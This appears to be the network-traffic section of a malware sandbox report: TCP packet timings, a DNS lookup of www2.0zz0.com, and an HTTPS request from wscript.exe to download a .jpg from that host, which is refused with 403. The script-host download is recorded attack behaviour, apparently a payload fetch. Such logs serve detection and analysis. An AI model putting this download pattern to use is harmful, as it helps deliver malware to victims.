          Feb 14, 2025 20:32:30.408083916 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.408092022 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.408103943 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.408119917 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.408128977 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.408132076 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.408157110 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.408178091 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.408412933 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.408466101 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.408467054 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.408485889 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.408514977 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.408524036 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.408535957 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.408584118 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.408932924 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.408982038 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.408982992 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.408996105 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.409014940 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.409038067 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.409102917 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.409157991 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.409158945 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.409173965 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.409198046 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.409209967 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.409733057 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.409776926 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.409785986 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.409794092 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.409817934 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.409837961 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.409873962 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.409910917 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.409919024 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.409926891 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.409950972 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.409959078 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.410594940 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.410654068 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.410718918 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.410763979 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.498838902 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.498898029 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.498904943 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.498918056 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.498945951 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.498965025 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.499006987 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499058008 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499059916 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.499074936 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499104977 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.499125004 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.499155998 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499202013 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.499207973 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499221087 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499255896 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.499269962 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499326944 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.499397993 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499440908 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.499564886 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499604940 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499615908 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.499623060 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.499644041 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.499653101 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.500138998 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.500152111 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.500178099 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.500200033 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.500204086 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.500252008 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.500252008 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.503746033 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.503774881 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.503824949 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.503830910 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.503860950 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.503882885 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.504102945 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.504125118 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.504165888 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.504172087 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.504193068 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.504211903 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.504770041 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.504801035 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.504831076 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.504836082 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.504869938 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.505609989 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.505635023 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.505669117 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.505677938 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.505700111 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.505724907 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.589253902 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.589279890 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.589327097 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.589338064 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.589390039 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.589533091 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.589555979 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.589595079 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.589601040 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.589620113 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.589647055 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.589883089 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.589906931 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.589935064 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.589941025 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.589987040 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.589987040 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.590194941 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.590215921 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.590255022 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.590264082 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.590297937 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.590320110 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.590754986 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.590776920 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.590811014 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.590816975 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.590853930 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.591166019 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.591188908 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.591223955 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.591229916 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.591255903 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.591276884 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.591502905 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.591526031 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.591568947 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.591576099 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.591597080 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.591619968 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.591792107 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.591814041 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.591855049 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.591861010 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.591886044 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.591907978 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.680706024 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.680732965 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.680778980 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.680799961 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.680824041 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.680845976 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.681077957 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.681098938 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.681127071 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.681133986 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.681155920 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.681174994 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.681207895 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.681231022 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.681258917 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.681265116 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.681288958 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.681308985 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.681704044 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.681725025 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.681761026 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.681767941 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.681790113 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.681808949 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.682080030 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.682100058 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.682132006 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.682138920 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.682162046 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.682182074 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.682240009 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.682260990 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.682301998 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.682313919 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.682380915 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.682707071 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.682730913 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.682771921 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.682779074 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.682807922 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.682837963 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.682997942 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.683022976 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.683068037 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.683074951 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.683104038 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.683145046 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.770489931 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.770514965 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.770576954 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.770589113 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.770613909 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.770634890 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.770812035 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.770833015 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.770859957 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.770867109 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.770903111 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.770903111 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.771081924 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.771100998 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.771188021 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.771194935 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.771233082 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.771492958 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.771512985 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.771559000 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.771567106 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.771583080 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.771601915 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.772273064 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.772293091 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.772344112 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.772351027 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.772386074 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.772764921 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.772784948 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.772828102 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.772834063 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.772851944 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.772855043 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.772872925 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.772883892 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.772902966 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.772903919 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.772944927 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.773262024 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.773282051 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.773319960 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.773328066 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.773344040 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.773360014 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.861015081 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.861041069 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.861295938 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.861314058 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.861352921 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.861377001 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.861380100 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.861393929 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.861437082 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.861479998 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.861716986 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.861737013 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.861780882 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.861788988 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.861839056 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.862040997 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.862061024 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.862114906 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.862123966 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.862169027 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.862348080 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.862368107 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.862407923 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.862415075 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.862432003 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.862461090 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.862732887 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.862752914 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.862822056 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.862828970 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.862875938 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.863029003 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.863049984 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.863107920 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.863117933 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.863167048 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.863357067 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.863375902 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.863425016 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.863431931 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.863471031 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.863495111 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.951745987 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.951781034 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.951847076 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.951889038 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.951904058 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.951972961 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.952157021 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.952184916 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.952224016 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.952233076 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.952277899 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.952541113 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.952569008 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.952608109 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.952615023 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.952632904 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.952661991 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.952836037 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.952858925 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.952915907 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.952924013 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.952972889 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.953157902 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.953181028 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.953231096 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.953239918 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.953274012 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.953299999 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.953551054 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.953571081 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.953609943 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.953617096 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.953663111 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.953861952 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.953890085 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.953934908 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.953934908 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.953950882 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.953963995 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.953999996 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.954005957 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.954027891 CET44349705104.21.112.1192.168.2.5
          Feb 14, 2025 20:32:30.954046965 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.954090118 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.954315901 CET49705443192.168.2.5104.21.112.1
          Feb 14, 2025 20:32:30.954332113 CET44349705104.21.112.1192.168.2.5
          TimestampSource PortDest PortSource IPDest IP
          Feb 14, 2025 20:32:28.656162977 CET6452053192.168.2.51.1.1.1
          Feb 14, 2025 20:32:28.666627884 CET53645201.1.1.1192.168.2.5
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Feb 14, 2025 20:32:28.656162977 CET192.168.2.51.1.1.10x5574Standard query (0)www2.0zz0.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Feb 14, 2025 20:32:28.666627884 CET1.1.1.1192.168.2.50x5574No error (0)www2.0zz0.com104.21.112.1A (IP address)IN (0x0001)false
          Feb 14, 2025 20:32:28.666627884 CET1.1.1.1192.168.2.50x5574No error (0)www2.0zz0.com104.21.80.1A (IP address)IN (0x0001)false
          Feb 14, 2025 20:32:28.666627884 CET1.1.1.1192.168.2.50x5574No error (0)www2.0zz0.com104.21.96.1A (IP address)IN (0x0001)false
          Feb 14, 2025 20:32:28.666627884 CET1.1.1.1192.168.2.50x5574No error (0)www2.0zz0.com104.21.64.1A (IP address)IN (0x0001)false
          Feb 14, 2025 20:32:28.666627884 CET1.1.1.1192.168.2.50x5574No error (0)www2.0zz0.com104.21.16.1A (IP address)IN (0x0001)false
          Feb 14, 2025 20:32:28.666627884 CET1.1.1.1192.168.2.50x5574No error (0)www2.0zz0.com104.21.32.1A (IP address)IN (0x0001)false
          Feb 14, 2025 20:32:28.666627884 CET1.1.1.1192.168.2.50x5574No error (0)www2.0zz0.com104.21.48.1A (IP address)IN (0x0001)false
          • www2.0zz0.com
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.549704104.21.112.14434144C:\Windows\System32\wscript.exe
          TimestampBytes transferredDirectionData
          2025-02-14 19:32:29 UTC344OUTGET /2025/01/31/04/672996792.jpg HTTP/1.1
          Accept: */*
          Accept-Language: en-ch
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
          Host: www2.0zz0.com
          Connection: Keep-Alive
          2025-02-14 19:32:29 UTC654INHTTP/1.1 403 Forbidden
          Date: Fri, 14 Feb 2025 19:32:29 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          X-Frame-Options: SAMEORIGIN
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM5bIw4WfFci4WiSx5X2u%2BIfVaJIb5bcnXMCqjheCwy96VHQRlaqfwyDtj3lqdZGgglnCJW%2BstpIwMg02uAxgwL3ZKTElE%2BqGcOSLo2H36SJq1CAhSdMScLF2nCXlu4D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 911f7c0389bc43b3-EWR
